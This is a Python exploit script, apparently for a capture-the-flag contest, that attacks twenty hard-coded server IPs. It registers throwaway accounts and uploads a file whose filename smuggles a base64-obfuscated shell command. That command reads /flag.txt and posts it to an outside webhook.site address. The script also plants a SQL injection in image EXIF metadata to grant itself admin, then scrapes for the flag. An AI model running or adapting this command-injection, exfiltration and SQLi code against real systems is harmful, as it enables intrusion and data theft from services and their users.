#!/usr/bin/env python3 import requests import random import string import re import subprocess from pathlib import Path # List of server IPs to test SERVERS = [ "54.179.69.160", "47.128.239.219", "18.141.25.211", "13.250.48.226", "52.221.249.62", "52.221.188.80", "13.213.42.191", "54.169.118.58", "18.141.209.30", "54.169.155.68", "3.0.177.253", "13.250.47.208", "47.129.37.150", "3.1.222.146", "13.229.198.100", "54.151.150.157", "13.229.207.1", "18.136.107.63", "52.77.233.125", "18.141.184.213" ] PORT = "10000" # Generate random username and password def generate_random_string(length=8): return ''.join(random.choices(string.ascii_lowercase + string.digits, k=length)) # Command injection payload CMD_PAYLOAD = "tes.png; echo 'cHl0aG9uMyAtYyAiaW1wb3J0IHVybGxpYi5yZXF1ZXN0OyB1cmxsaWIucmVxdWVzdC51cmxvcGVuKCdodHRwczovL3dlYmhvb2suc2l0ZS9hNDM1ZDdhZS02ZDIzLTQwY2ItYTllNy00ZjgwMzk2YzYwNWMnLCBkYXRhPW9wZW4oJy9mbGFnLnR4dCcsICdyYicpLnJlYWQoKSki=' | base64 -d | bash;#.jpg" # SQLi payload SQLI_PAYLOAD = "a'; UPDATE users SET role='admin' WHERE username='{}';--" # Local image files CMD_IMAGE = "test.png" # For command injection SQLI_IMAGE = "sqli.png" # For SQLi def exploit_server(host): print(f"\nTesting server: {host}") BASE_URL = f"http://{host}:{PORT}" REGISTER_URL = BASE_URL + "/register" LOGIN_URL = BASE_URL + "/login" CREATE_URL = BASE_URL + "/create" HOME_URL = BASE_URL + "/" PROFILE_URL = BASE_URL + "/profile" # Generate credentials USERNAME = generate_random_string() PASSWORD = generate_random_string() print(f"Generated credentials: Username={USERNAME}, Password={PASSWORD}") s = requests.Session() # Step 1: Register a new user r = s.post(REGISTER_URL, data={"username": USERNAME, "password": PASSWORD}) if r.status_code != 200: print(f"Registration failed on {host}. Status: {r.status_code}") return False print(f"Registered user: {USERNAME}") # Step 2: Log in r = s.post(LOGIN_URL, data={"username": USERNAME, "password": PASSWORD}) if r.status_code != 200: print(f"Login failed on {host}. Status: {r.status_code}") return False print(f"Logged in. Cookies: {s.cookies.get_dict()}") # Step 3: Command injection via filename cmd_img_path = Path(CMD_IMAGE) if not cmd_img_path.exists(): print(f"Command injection image {CMD_IMAGE} not found") return False with open(cmd_img_path, "rb") as fh: files = {"image": (CMD_PAYLOAD, fh, "image/jpeg")} data = {"title": "Command Injection Payload", "content": "CTF attempt"} r = s.post(CREATE_URL, data=data, files=files) print(f"Command injection upload status on {host}: {r.status_code}") print(f"Upload response: {r.text[:800]}") # Step 4: SQL injection via image metadata sqli_img_path = Path(SQLI_IMAGE) if not sqli_img_path.exists(): print(f"SQLi image {SQLI_IMAGE} not found") return False try: subprocess.run([ "exiftool", "-overwrite_original", f"-Comment={SQLI_PAYLOAD.format(USERNAME)}", SQLI_IMAGE ], check=True) print(f"Modified {SQLI_IMAGE} with SQLi payload") except subprocess.CalledProcessError as e: print(f"Failed to modify {SQLI_IMAGE} with exiftool: {e}") return False with open(sqli_img_path, "rb") as fh: files = {"image": (SQLI_IMAGE, fh, "image/png")} data = {"title": "SQLi Exploit", "content": "Testing SQLi payload"} r = s.post(CREATE_URL, data=data, files=files) print(f"SQLi upload status on {host}: {r.status_code}") # Step 5: Get home page to find newest post ID r = s.get(HOME_URL) print(f"Home page status on {host}: {r.status_code}") post_ids = re.findall(r'/post/(\d+)', r.text) if post_ids: max_id = max(map(int, post_ids)) print(f"Newest post ID: {max_id}") else: print(f"No post IDs found on {host}") return False # Step 6: Check profile for flag r = s.get(PROFILE_URL) print(f"Profile page status on {host}: {r.status_code}") flag_pattern = r"GEMASTIK18\{.*?\}" flag = re.search(flag_pattern, r.text) if flag: print(f"Flag found on {host}: {flag.group(0)}") return True else: print(f"Flag not found on {host}") return False def main(): print("Starting CTF Exploit") for host in SERVERS: success = exploit_server(host) if success: print(f"Exploit succeeded on {host}") else: print(f"Exploit failed on {host}") if __name__ == "__main__": main()